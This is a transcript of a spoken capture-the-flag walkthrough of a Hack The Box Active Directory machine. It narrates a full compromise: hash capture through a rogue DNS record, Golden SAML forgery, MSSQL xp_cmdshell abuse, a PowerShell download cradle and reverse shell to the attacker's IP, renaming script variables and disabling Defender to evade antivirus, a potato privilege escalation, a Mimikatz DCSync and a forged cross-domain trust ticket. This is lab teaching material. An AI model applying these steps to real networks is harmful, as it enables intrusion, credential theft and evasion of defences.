Bloodhound. We can do Cypher, and we'll match P and say user like that. And then we'll do the right here. So let's go with generic all. I think we have to get rid of one of these parentheses. And then we will go over anything. I think this is a valid cipher query. No. Let's try it with read GMSA password. There we go. So this does show that Justin.Bradley can read the GMSA password over ADFS GMSA. And GMSA is Group Managed Service Account. So we want to mark this as high value. Okay. And then let's see. We want to do shortest path to this maybe. I don't see that. I'm still learning like the new Bloodhound and what they have. Shortest path to high value targets. Oh God. Justin.Bradley. So generic all account operators has access to that. If we look at inbound control of this, we don't have anything. So we have to get over to Justin.Bradley. And if we went all the way back and thought about the recon we did earlier, let's go, it was on the intranet, I think. So let's go back to intranet.ghost. And this is where it starts really helping if we take notes, right? Because if we go to form, we see Justin.Bradley here is trying to connect to bitbucket.ghost.hdb. It doesn't work. And then Catherine says, migration's not ready yet, so DNS isn't configured. Keep your script running. So we want to register this domain. And by default in Active Directory, domain users can register domains that don't exist as part of the subdomain. So the first step is to make sure this subdomain doesn't exist. So I'm going to do ns lookup. We can do server 10.10.11.24 and then bitbucket.ghost.hdb. That is the domain, right? Yes, it is. And we get no response. So let us now, I'll keep this window open and we'll do it over here. So what we want to do is use DNS tool to add a domain. And DNS tool is part of KRB Relay X. So you can just go to GitHub and download this package. And then you have DNS tool.py, and this will let us create a new name. So let's do Python 3 DNS tool -h to see how to use it. And let's see, KRB 5cc. Let's go back here. Where do we have this ticket? KRB 5 cc name is equal to Florence.ccache. Then Python 3 opt KRB relay X DNS tool. And then what we want to do, I know the first one just is -u is going to be the user. So we're going to do ghost.htb. Then we can specify the user, so Florence.Ramirez. And then -k is standard Impacket for adding a, for using Kerberos authentication. Then we're going to do -a and add a record. So we'll do -a add. And then target record is -r. So we'll do -r and then bitbucket. And then let's see. There's probably like a zone or something because we have to specify where this record goes to. Is there a zone? There we go. So we can do --zone ghost.htb. Then -d for the data. That's going to be 10.10.14.8. And then we have to specify, do we have to specify anything else? Let's see. IP address of the DNS server. So let's do that. 10.10.11.24. And then probably the target, which will be dco1.ghost.htb. And I think I got that all correct. We will run it again. Connecting, adding new record, LDAP completed successfully. Let's go back up here, hit enter, and there we go. We probably should have started responder. So we'll do Python 3, -I sudo, is it responder? Yep, -I ton 0. And almost immediately, we get a hit from Justin because he was reaching out to this domain, it existed, and then he attempted to connect to it. So we got his net NTLM v2 hash. So let's copy this. And then we can go over to my Kraken box, which is just why I have Hashcat. You can run Hashcat anywhere. I don't recommend running it in a VM just because it goes very slow. So let's v hashes, call it Ghost, paste this in, fix that name. So it's Justin.Bradley. Then /hashcat, the file, word list rocku.txt. And I think that's all we need because it should be able to auto detect this as a NTLM v2 hash. Let's see. There we go. It's already cracked. We can look at it and we have Justin Bradley's password of QWERTY up 1234 $. So I'm going to put this in credentials. Justin Bradley, put that password. And let's see. Let's just test this out. So we'll do NXC SMB 1010 11 24 Justin Bradley -P. Put in this password. And we can access it. And Justin, if we look back at Bloodhound data, let's go here. Search. Let's do Justin. We can now mark Justin as owned. Looking at member of, let's see what groups. We're a member of remote management, so we can WinRM, right? So I could do WinRM, and it'll also tell me pwned because I can get a shell. Now, keep in mind, remember Justin could also read the GMSA password. We've already got rid of that Bloodhound query, but if we do --GMSA on, I think, LDAP, there we go. It just automatically reads all the group managed service account passwords that we can, and we have ADFS right here. So let's go back into credentials. We'll do ADFS GMSA $. Put that there. So we have that hash. And the other thing we had, let's put this back on my clipboard, is back in the recon, we had the domain of core, right? So I'm going to close all these tabs just to keep things running well. And let's now turn on Dark Reader. There we go. That looks better. We have a new domain, federation.ghost.htb. So sudo v etc host. We have it already open, probably here. Federation ghost HTTP. Save that. Let's add the certificate so we can connect to it. And then, what was it? Justin Bradley at ghost.htb. And what is this password? Cat credentials. Put this back on my clipboard. Paste. It's thinking about logging in. Surprised it's taking this long. Come on. It's got another SSL warning now. Accept the risk. Resend. And then we get this page is only available to administrator. But this whole federation page, let's go back here. HTTPS, federation ghost HTTP. We probably have to go to core. Is it 8443? We have it in a cookie now, but this is using Active Directory Federation services. And since we have the ADFS account, we should be able to create a Golden SAML, which will allow us to create our own ticket for this. And this is annoying. Unauthorized core. Maybe it's on the Federation domain. Let's see. Let's just go into our preferences and delete cookies. Settings. Clear. If I can type. Data. Cookies in sight. There we go. Go back to the core. Log in. There we go. So we want to leave it here and dump the ADFS data. And we can do that with the ADFS account. The only thing I want to check is how to get a shell as this, because to dump the data, I don't know a way to do it without logging into the box. So let's do nxc winrm 10.10.11 dot, what is it, 24. ADFS like that, and then capital H for a hash. And if this doesn't work with winrm, then my next step would be to what is that error message? Would be use like Justin.Bradley to log in, and then use run as cs.exe to switch over to the ADFS user. And I have no idea why we're getting this zip argument. That is weird to me. But let's do evil winrm -i 10.10.11.24 -u ADFS underscore GMSA. And then, is it like dash hashes, or what is the hash for password? Dash capital H. And let's specify the NTLM hash. So hopefully this lets us in. And there we go. We have a shell as ADFS GMSA. So what we want to do is grab the ADFS dump binary, I want to say. ADFS dump GitHub. This is it. Come on, GitHub. And there's no release. Let's see. I probably have it on my box, though. So if we go to opt, sharp collection. If you don't have sharp collection, if you Google it, right? Collection, GitHub. Yes. It's just the first result on GitHub. It has a bunch of .NET tools already compiled, right? So we can do grep-i ADFS. And awesome, we have it. So I'm going to copy the .NET 4.7, and we will see if .NET 4.7 is on the box, which I bet it is. Just copy it to HTTP Ghost. And then we can do upload. What is the file name? ADFS dump.exe. It's uploading. Come on. There we go. Upload successful. And now let's just execute it. So ADFS dump.exe. Run this. And it should give us a lot of data. And then I just copy this back to my terminal. And then the next tool we'll need is called ADFS spoof, I want to say. And this will be something we run on our box. And we create the connect SID essentially to say we're authenticated as administrator. So let's just copy all this output to our box. Let's see. I'll just do a new tab, v ADFS dump output. That's not it. There we go. Okay. So we want to be able to run this tool now. So let's copy the URL and then we'll clone it on our box. So git clone, put this in, and then let's go into ADFS spoof. Let's create a virtual environment. So Python 3-mvm.vm. And then we can do a source VM bin activate. Okay, pip3 install -r requirements.txt. And if this doesn't install for you, it's probably because you're not running Python 3.11. I'm on 3.11.12. If you have a distro that's using like 3.12 or something like that, it probably will not work. But once you have the tool running, you should be able to do ADFS spoof. And the arguments are going to be a little bit weird. There is a sub command module. Like once we specify the arguments we want here, which is going to be -b for blob and s for server, then you got the different like ways it supports it. Office 365, Dropbox, SAML2, which is how Active Directory single sign-on does it. Then I guess dump, I don't know what dump is. But each of those will have their own set of options. I think it was like O365 is another one, right? So there's a lot of options we'll have to do. But first we have to get the blob. And that is going to be the encrypted PFX block and decryption key. And those are in the ADFS output that we grabbed. So if I do less .. ADFS output, the second one is going to be the decryption key. So let's just go ahead and grab this first. So I'm going to echo this, and it wants it in hex blob format. So let's get rid of all these dashes so we can put it over to XXD. So I'll do sed, replace slash with nothing. Now we just have a string of hex characters, so we can do XXD-R-P. And that looks good. So this is going to be decryption key.bin. And then the next thing we have to get is the encrypted token signing key. And this is the reason why I just copied it as a big string, because if we, I copied the entire output. Because if we do less -S, we can see this base 64 is just on one line. So instead of trying to copy and paste this huge base 64 string, since we have all the output on our computer, we can just grep this. And there we go. So let's pipe this base 64-D. And then we can direct this to, what is it called? Something PFX blob. I'll do encrypted pfx.bin. There we go. So let's start running the commands we have. So Python 3 ADFS spoof -b. What do we call it? ADFS spoof. Come on. There we go. Encrypted pfx.bin. And then the key, which is decryption key.bin. I wish it had tab autocomplete there. And then we need to specify the server, which was core ghost HTB. Then we can say SAML2-H, and we need a few things. So first is going to be the endpoint, and we get the endpoint from doing a login request. So instead of stepping through everything one at a time, I'm just going to set this to go to Burp Suite. Let's go over to my history tab. We're going to clear history. And now we'll go do a login. So we can say Justin.Bradley at ghost.htb. Go back to our box. Get his credential. Copy. Paste. Sign in. And we can see everything that's going on. So once the login request happens, it's going to direct us back somewhere. And that's going to be the endpoint right here. So this ADFS SAML post response. So this is what we want. So let's go ahead and start putting this in. So endpoint HTTPS, core ghost HTTP 8443, ADFS SAML post response. Get rid of that extra slash. There we go. And then the name ID format, it uses emails. I bet if we found it in here, this is going to be something called the assertion. I'm getting ahead of myself if I talk about that now, but you'd look at that and see it gives an email. But I'm going to Google name ID format SAML. Is it going to load or is it just going slow because I'm going through Burp Suite? Intercept off. There we go. Let's see. I want to go over to Google. And we'll go to this Oracle article. And this has a list of all the name ID formats. We have persistent, transient, email address, subject name. We may be able to do it with the subject name, but email address is how the login's happening. So, we don't have to talk about it, the assertion, right? When we went to log in, we logged in with our email address. So that's also how you know. So name ID format like that. And then the actual name ID. And we're going to become administrator at ghost.htb. And then RP identifier. So the identifier for the relaying party, that is going to be core ghost HTTP. And now we have to get the, is it dash dash? It is. Assertions. And this is going to be the somewhat hard one to find. If we look in the history, we have this SAML response where we went to the ADFS post response. And I want to say this giant base 64 string, if we look at it, yes, we have the data here. And let's just pipe it over to our terminal. And now we have to just find where the assertion is. And if I search for the username, that's going to be the easiest way. It's going to be this attribute value to, let's see, attribute value to attribute value, I think. No, right here. I think. Yeah, this looks fine. And we'll have to edit this in order to remove Justin.Bradley and swap it with administrator. So let's do attribute value. And we'll do administrator. And then email is going to be administrator at ghost.htb. And let's see. What do I have? We have too much data. Maybe we don't have enough. We need attribute statement. So let's see. We did that. Attribute name. Let's go attribute statement to attribute. Maybe this is it. We'll just copy the piece we did not have. Opening an end tag. Attribute statement, attribute name. Let's start with attribute name. There we go. So this will be spoof.out, I'm going to call this. And again, the reason why I'm doing that is all the base64 is just on one line. So it makes it easy to copy. So we can grab this and then xclip, let's see, dash selection primary. Is that how we do it? Grep that on spoof, selection, primary, clipboard. I always forget if it's primary or clipboard for Control V, so I always just do them both. But now we should have a SAML response that says we are administrator. So what we want to do, I wonder if I can just paste this. So I sent that to repeater. We'll see. I'm not sure if I can or if I have to redo the whole login flow. But if I say, this is my SAML response, it's going to give me this cookie. So let's copy this. Go back to here. Let's go into our cookies. Change our SID. Refresh. It still says unauthorized. We had the URL in. Get rid of that, and we're at the login page. So what happened before is there's an endpoint / unauthorized. And it says we're currently logged in as administrator, but it's only available to administrator. That's just because like the endpoint is always going to be there. If we're authorized, it's not going to redirect us away from unauthorized. So that's why once I put the cookie in, I erase the unauthorized, and here we go. So here we are at the Ghost config panel. It's the database debug. We can run queries. So if we do like select current user, we can see we're the web client user. It's also telling us there are linked databases. So we could run like sp linked servers. And we see there is a server name at primary. So we could go with, let's do a select host name real quick. This is going to run on whatever server we're running as. And it's weird. It's a Docker container, it looks like, based upon that host name. I didn't know Docker could run like MSSQL or something. But we can now do select star from open query, go over to the primary server. I think we want that in capitals. And then do a select host name. Close that out. Run this. And we can see DC01. So let's go ahead and SQL query. We'll just paste this. Copy the query we just ran. Paste it in here. Because that box is small, it's going to be a little bit easier if we just work in a text pad. Let's save that. Okay. So what we want to do is we could try like an XP CMD shell. So we can do open and then exec XP CMD shell. Who am I, to see if we can run that. And we probably could have tried that also on just the host, but we'll get access denied, I believe. Permission denied. If we took the linked thing off, we also get permission denied. So we don't have this permission. Now we could just blindly try to impersonate. And I think that's what kind of a lot of people just do in this case, is they just will run the impersonation command and see if it works. But I don't like really blindly doing things. Let's enumerate the permissions manually on SQL, see we have the permission, and then we will impersonate SA. So if we go back to this query, the select star from open query, let's do a select star from sys.server permissions. So this is going to list all the permissions. I don't know why I closed that, because we can just cat this. One day I'll get in the muscle memory of being able to copy and paste out of V, but that is not today. So these are all the permissions, and we can see the permission view any database. The one has granted principal ID to. I think one's probably going to be SA or like some default administrator. But what I want to do is convert these into human readable names. And there is another table. So if we get rid of the server permissions, that will be, what is it? I think server principals, because there's a principal ID and stuff. So if we look at this, here we go. Let's see. Principal ID 2 is public. So this is how we can translate these names. So let's go back into our query. And this is going to get a little bit complex. So we'll do select star from sys server permissions, and I'll call that perm. And then we're going to do a join sys.server_principals. And we'll call this as grantee on grantee.principal ID. I think that's what it was. Where is it? Is this the roles? What are we looking at? Yeah, principal ID. There we go. Is equal to perm dot, this is going to be grantee principal ID. And instead of select star, we can do grantee.name and then perm dot, I think it's permission name. Got this. We can copy this query and see what SQL error we made. We didn't make any. Awesome. So we have SA and that. So now we just want to do the other one. So we have the grantee. We want to change that to be grantor. So change the E to grantor. And let's see, we can do grantor.name. Now copy the query, paste it in, unclose quote. Let's see. Oh, there we go. Duplicate column names. Okay. So it doesn't like that we have grantee.name and grantor.name. So I'm going to do as grantee. And this will be as grantor. Let's just make our SQL more polite by not capitalizing everything. Let's copy all of this. Paste. There we go. So we can see the grantor SA has given Bridge Corp the permission to connect. Next down, we see SA granted Bridge Corp the permission to impersonate. So this is what enables us to do what we're about to do as impersonate. If you wanted to, you could also do where clauses in this. So we could also do like where, where is it? Grantee.name is equal to current user. And this will show us like our current permissions, right? I think that's grantee. Let's just cat this and try it. Where is... What did we screw up there? Oh, because I have a single quote. Because that quote goes here. Let's copy this. There we go. So the two roles Bridgecorp has been granted is connect and impersonate. So now let's try abusing the impersonate. So to do that, we're going to use execute. And then we can say execute as login. And then a semicolon. Exec xp cmd shell. Who am I? At primary. Save it. Cat it. And run. Incorrect syntax near SA. Oh, let's make that as double quotes. Paste. Not permitted in this context. It does not like SA being in double quotes, maybe? And I'm doing a double single quote because we're doing single quotes here. So this is how you escape a single quote and single quotes. Bit of quote inception, but let's try this. Copy, paste, and blocked. So now the next step is we have to enable XP-CMD shell. And we can just delete those to keep this a little bit cleaner. So I'm going to copy this line and then MSSQL cheat sheet. Copy this. And let's see. This is what we want. So we'll run this. And put those stupid quotes in. Let's fix the angled quote. Then we do reconfigure. Then we have to do this one. Keep in mind, it's going to put the stupid angled quotes. Reconfigure. Okay, hopefully this does it. Let's copy this. Go here. Incorrect syntax near show. Because quotes. I guess I probably should have wrapped the whole thing in double quotes, and I may have been able to use single quotes in the actual query, but I've already gone too far. Hopefully this is it. Please work. That looks promising. Let's execute our XP-CMD shell again. And there we go. We have it. Awesome. So now we have to get a reverse shell going because, yeah. So let's see. I'm going to do make dir dub cd dub cp user shared nishang. Is it lowercase? Yes. Shells. Then invoke PowerShell TCP one line.ps1. Call it shell.ps1. Let's see. Let us just do, we can do the top one. So shell ps1, do that. There. Let's do 10.10.14.8. Port 9001. Save. And then Python 3 -m HTTP server. We also need to create our PowerShell one-liner. cd cradle v cd dub v cradle. Then what is it? IEX new object net.web client. download string http 10.10.14.8 port 8000 shell.ps1. I think that's all right. Let's cat cradle I convert to UTF 16 little endian. Is it UTF 16 LE? And then base 64 W0. Copy this. And let's see. XP-CMD shell. PowerShell-ENC for encoded command. Copy. Paste. The endeavor starts with this. Is too long. That's annoying. I wonder if this is short enough. Okay. I'm getting into quote inception here. This is what I always hate. Maybe. Let's hope this works. Copy, paste. It's taking longer. I don't know why it's taking so long. I haven't got a hit. 10.10.14.8, 8000. Fail to cancel request. That was one of the slower things I've seen. It eventually made the request, but man, was that delayed. During the execution. I'm guessing this is going to be antivirus, a fail to create process. So this is why I always like doing web cradles, because we can see it makes the GET request back to us and then just hangs. I'm guessing maybe it's cached or something. NC L, let's do ENP 8000. Like, I am baffled why I don't see the request come in immediately. Like, that request is so delayed for the GET request. Let's see. Windows error code 5. Lack of permission. Let's see. Run this again, maybe? Huh. It made the request once to us, but it doesn't want to do it again. What if we call it something else? Shell2.ps1. Let's try vSQL query. invoke web request. Let's see. That goes out the quote of PowerShell. I think that's good. Okay, so the invoke web request is going much quicker. So what we want to do is create a one-liner with this. So we wrap this in a IEX. And then we can do, I think we have to do use basic parsing. And then close out that IEX. And I think that's good. Let's copy, paste, and the script contains malicious content and has been blocked by our antivirus software. So now we have to go and edit the PowerShell script. So we have to rename all the variables. So we can do client is equal to C. And we have to make sure we replace the $2. And then let's see, stream is now going to be, we'll call it IPSEC. Then we have bytes, and that's going to be the data. Sure. Let's see, what is after that? We have just data. And that can be $D. Okay. Send back. This can be SB, I guess. And that took care of send back 2. We have send byte to, we'll call it TB for transfer byte. Okay. And then the other thing we have to do is get rid of this PS path thing. And that may be it. So let's go back here. Send the request. Let's do the use basic parsing. Oh, it worked actually, I think. Who am I? There we go. So we have a shell here. I always like using RL wrap, and I did not do that here. Sudo apt install RL wrap. Let's make sure we have it on our box first. I guess I need to add that to the Ansible playbook. Let's rerun this. Use basic. There we go. So now I can do clearing the screen and stuff. So if we do who am I /all, we can see, let's see, we have the SE impersonate privilege, which is super common from exploiting SQL. So let us get one of the potato exploits, and yeah, I'm going to use EFS potato. That's one of the more latest ones. And the other thing that's good about this file is it's a single CS, so we can just compile it easily. So copy this. Let's see. We're in dub, so we'll call this efsp.cs, I guess. Or what would they call it? EFS potato.cs. Paste. Here's our shell. Let's go in program data because I know I can write there. pwd. Awesome. IWR, use basic parsing 1010 14 8 8000 efs potato.cs to efs potato.cs. And now we should be able to compile it. Then we just do this one, right? Come on. It may take a second to compile. And we do EFS potato command and then the pipe. And it defaults to LSARPC. So we'll leave the default. Do a dir. It does not look like it compiled. csc.exe. Maybe I have a typo or something. That did not work. Maybe it's not in our path. So let's do dir c:\windows Microsoft.NET framework v4.0.30319. This is where CSC should be. It's probably at the top. Come on. Yep, CSC is there. So I'm going to copy this. And one of the annoying things when you do PowerShell or reverse shells is you normally lose standard error. There's ways to recover that. I just don't remember off the top of my head. This looks better. But we have errors. But at least we're seeing things. So it must be how I have copied this file down. So let's go back here. Raw, we'll just wget this. Let's see, where'd I download it? There. Not found. Probably because I have casing. EFS potato. Okay, so that's how it downloaded. Let's see. We have to just save the body. Invoke web request, save body. Let's see, does this tell me? Out file. That did not do it. Is it .content? That does not look like it's it. I think I lost my shell. I did. That's annoying. Let's get this again. Ghost core. I may have to re-enable. Nope, I don't. Awesome. Program data. Okay, let's just try a curl. HTTP 10.10.14.8. Butchered that. Curl HTTP 10.10.14.8. 8000. Grab the file. -o. That. dir. Type efs potato.cs. That is better. csc.exe. Awesome. It's still in my tmux history, so I can just copy and paste this. And what is going on? Let's delete efs potato.cs. Curl. Run it again. wget out file. Something is going on. I have HTML. And I should not have HTML. Let's delete that. wget raw. I thought I did raw last time. That looks better. Okay. Let's delete it. Go back to curl. Compile it. And we finally have the exe. Awesome. So rl wrap nc lvmp 9001. And now we can run efs potato.exe. I think we just put the command, right? Let's go back to see the usage. Yep, command. So I wonder if I can just do my PowerShell command and SQL query. So can we just run this? Like that. There we go. Who am I? And now we're anti-authority system. So we have escalated from the service account to the system, but we are not done yet because we are still on the primary. We're not exactly, if we do, I guess, ipconfig will tell us easily. We're 10.00.10. We want to be 10.10.11.24. We're still in a VM. We're on probably the corp.ghost.htb domain. And we can verify that with a PowerShell command. So we'll do system.net.dns and then resolve null.hostname. And there we go. We are primary.corp.ghost.htb. So if we went back into our Bloodhound data, let's go localhost, I think 8088. Yep. Admin, and then please subscribe. Log in. This should still be up. So let's go back to the site for queries. Let's see. Where is domain trust? There it is. So we have corp.ghost.htb. So if we look, we can see primary. Do we not have Bloodhound data for this? Because we probably didn't get other domains. .ghost.htb. I do not. That's probably the domain controller. I'm going to see if we can get by without it, because I don't want to go copy #pound and run that. So what we have to do is get Mimikatz on this box. And I'm going to try to disable Defender so we don't have to go worry about obfuscating Mimikatz, because we want to extract the inner domain trust account. And I think that did it. So let's go ahead and download Mimikatz. Mimikatz GitHub. Let's see, Gentle Kiwi. Download this one. Hopefully it lets us download. Awesome. mv downloads Mimikatz 7zx, extract it, and we want x64 mv mimikatz.exe up one directory. Let's go back to our shell. Program data, and let's do a curl http 10.10.14.8 8000 mimikatz exe mimikatz.exe. Did that download? Looks like it did. Let's do /mimikatz.exe. I'm just going to do the exit real quick. Make sure we can run it. It's taking a long time, so maybe we can't. dir again. It's there, so I think we can. Mimikatz.exe, LSA dump, DC sync, all CSV format, and then exit. Wonder... Defender definitely cleaned it up. Let's see. Set MP preference, disable real-time monitoring true. Let's wget this again. Call it mimi.exe. There we go. We have the output. So this is going to be the inter-domain trust account for Ghost. So this is what we want to use. This is for the child domain itself. But this, since the bi-directional trust is there, this account can be signed and create Kerberos tickets on the parent domain, because the parent domain trusts the child. So now we want to use ticketer. So ticketer.py, and then we do -nt hash. Let's grab the Ghost hash. Then we want to specify the domain SID, and that's going to be the domain SID of the corp domain, so the child domain. So copy this. Then we want to do the domain, so we can say corp.ghost.htb. And then we're going to do extra SIDs. Is it SIDs or SID? Let's see. Extra SID. And we're going to take the ghost.htb SID. So let's go to ghost.htb. Copy this. And then I'm going to tack on 519. And the reason I'm doing that is 519 is the default RID for enterprise admins. So if we search for enterprise admin, we can see it ends in 519. We could have also done like domain admin. I think that is like 512. Is that the default grid? Yeah, 512 would be domain admin. So we can specify whatever we want here. I just want to do the domain admin or enterprise admin. And then we're going to do SPN. I'm going to say it's a KRB TGT service principal for ghost.htb. And then the username. And the username, the crazy thing is, doesn't even have to exist because the only thing that's validated is going to be the groups. It never validates the username, so it can be whatever you want. If you're trying to be stealthy, you probably should put in like administrator here, a user that's in this group, because if you don't, then this is definitely going to stick out like a sore thumb. And if we left this SPN out, it's going to create a golden ticket, and we don't actually want the golden ticket because the golden ticket's only going to be for the corp.ghost.htb domain, right? We want it to be for the ghost.htb. So we create this, and we have a ticket granting ticket now. So we can use this ticket with get service ticket. So we'll do KRB5cc name is equal to IPsec like this, then get service ticket.py, and then specify Kerberos, no pass, SPN, and this is going to be the CIFS service principal. This is the like file system, so SMB essentially, ghost.htb, and then we need the fully qualified name, so ghost.htb IPsec at ghost.htb. So what this is going to do, we're going to go to, with our ticket granting ticket, to the parent domain. It's going to go over to the child domain, say, hey, is this user valid? Should he be able to access me? And then the child domain's like, yeah, you trust me. Here's the service ticket for that. It relays it to us, and now we have access. So let's now do KRB5cc name is equal to this, and we'll just test it with netexec real quick. SMB 10.10.11.24. Use K cache to use the cache, and please work. That's not good, I don't think. I thought this would work. I probably made a typo somewhere. Let's just try something real quick. We're just going to run secrets dump. Maybe netexec won't be able to use this ticket. I'm pretty sure it should be able to though, but we'll do secrets dump -k, no pass, just DC, IPsec at dco1.ghost.htb. And let's see what error comes out. Nope, it looks like it's working. So I don't know why netexec didn't want to work, but there we go. So now we have dumped the parent domain. And let's see, Kerberos key, we have the NT hash of administrator. Where is it? That's HMAC. Let's see, right here probably, this one CD. Let's grab this. And let's see, evil winrm -u administrator -capital H -I 10.10.11.24. And there we go. So we can do desktop and get root.txt. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.